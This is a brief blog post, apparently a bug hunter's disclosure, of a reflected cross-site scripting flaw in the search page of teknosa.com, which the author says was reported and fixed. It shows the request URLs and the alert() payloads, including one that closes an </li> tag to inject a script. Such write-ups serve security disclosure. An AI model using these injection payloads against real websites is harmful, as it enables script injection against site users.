Request:
https://www.teknosa.com/arama/?s=</>alert()
Response (view-source):
...<li></>alert()</li>...
I tried this payload:
<script>alert(1)</script>
but this payload did not trigger XSS and I tried again it with </li>.
Request:
https://www.teknosa.com/arama/?s=</li><script>alert(1)</script>
Response:
and I reported to Teknosa with mail. They fixed this vulnerability but they didn't even congratulate me.
No comments:
Post a Comment